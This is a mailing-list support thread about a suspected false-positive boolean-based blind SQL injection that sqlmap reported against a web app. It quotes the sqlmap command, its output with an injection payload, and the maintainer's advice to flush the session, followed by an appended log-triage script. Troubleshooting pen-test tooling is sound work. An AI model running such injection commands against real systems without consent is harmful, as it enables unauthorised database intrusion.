Re: [sqlmap-users] boolean based blind on progress db
From: Miroslav S. <mir...@gm...> - 2016-08-01 11:00:24
Hi.
This looks like a false positive. Please rerun with --flush-session.
Kind regards
On Mon, Aug 1, 2016 at 12:57 PM, Niall <jam...@gm...> wrote:
> Hi,
>
> I am using SQLMAP to pen test a web app and it says that a field is
> boolean based blind vulnerable.
>
> The DB is an OpenEdge Progress DB, so I understand SQLMAP does not support
> this DBMS. However, can I still use it to test whether there is a SQL
> injection vulnerability (and not exploit it) or will it not detect the
> vulnerability at all?
>
> I am not sure whether SQLMAP cannot get any info out of the DB because
> Progress is unsupported or it is a false-positive.
>
> Below is SQLMAP output (If I run the exact same query on the DB itself it
> returns data):
>
> sqlmap -u 'http://xxx/login?host=1' --sql-query="select ('role') from
> pub.role_type" --no-cast --threads=2
> _
> ___ ___| |_____ ___ ___ {1.0.7.1#dev}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 11:53:57
>
> [11:53:57] [INFO] resuming back-end DBMS 'mysql'
> [11:53:57] [INFO] testing connection to the target URL
> [11:53:57] [CRITICAL] previous heuristics detected that the target is
> protected by some kind of WAF/IPS/IDS
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: host (GET)
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: host=1") AND 1239=1239 AND ("UqXp"="UqXp
> ---
> [11:53:57] [INFO] the back-end DBMS is MySQL
> back-end DBMS: MySQL 5 (MariaDB fork)
> [11:53:57] [INFO] fetching SQL SELECT statement query output: 'select
> ('role') from pub.role_type'
> [11:53:57] [INFO] retrieving the length of query output
> [11:53:57] [INFO] retrieved:
> [11:53:57] [INFO] retrieved:
> select ('role') from pub.role_type: None
> [11:53:58] [INFO] fetched data logged to text files under
> '/root/.sqlmap/output/'
>
> [*] shutting down at 11:53:58
>
>
> Thank you for your help.
--
Miroslav Stampar
http://about.me/stamparm
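
The quoted output shows why the finding is suspect: the DBMS and the injection point were both resumed from a stored session, and the retrieval came back empty. The following is an added example, not part of the thread and not sqlmap code, that triages such a log for those signs; `triage`, its result codes and the `expected_dbms` argument are hypothetical names chosen for the illustration.

```python
import re

# Log lines taken from the sqlmap output quoted in the thread (wrapped lines rejoined).
SAMPLE_LOG = """\
[11:53:57] [INFO] resuming back-end DBMS 'mysql'
[11:53:57] [INFO] testing connection to the target URL
[11:53:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
[11:53:57] [INFO] the back-end DBMS is MySQL
[11:53:57] [INFO] retrieving the length of query output
[11:53:57] [INFO] retrieved:
[11:53:57] [INFO] retrieved:
select ('role') from pub.role_type: None
"""


def triage(log_text, expected_dbms=None):
    """Return (code, reason) pairs explaining why a finding needs re-verification.

    expected_dbms is the tester's own knowledge of the back end (an assumption
    of this example, not a sqlmap option).
    """
    findings = []
    lines = log_text.splitlines()
    resumed = re.search(r"resuming back-end DBMS '([^']+)'", log_text)
    if resumed:
        findings.append(("stale-dbms", "DBMS '%s' came from a stored session" % resumed.group(1)))
        if expected_dbms and expected_dbms.lower() != resumed.group(1).lower():
            findings.append(("dbms-mismatch", "stored DBMS differs from known back end '%s'" % expected_dbms))
    if "injection point(s) from stored session" in log_text:
        findings.append(("stale-injection", "injection point was resumed, not re-tested"))
    if "protected by some kind of WAF/IPS/IDS" in log_text:
        findings.append(("waf-noted", "earlier heuristics flagged a WAF/IPS/IDS"))
    # An INFO "retrieved:" line with nothing after the colon means no characters were inferred.
    empty = sum(1 for line in lines if re.search(r"\[INFO\] retrieved:\s*$", line))
    if empty:
        findings.append(("empty-retrieval", "%d retrieval(s) returned no characters" % empty))
    # The result line is not timestamped and ends in ": None" when nothing was extracted.
    if any(not line.startswith("[") and re.search(r":\s*None\s*$", line) for line in lines):
        findings.append(("no-data", "the query result is None"))
    return findings


if __name__ == "__main__":
    for code, reason in triage(SAMPLE_LOG, expected_dbms="progress"):
        print("%-16s %s" % (code, reason))
```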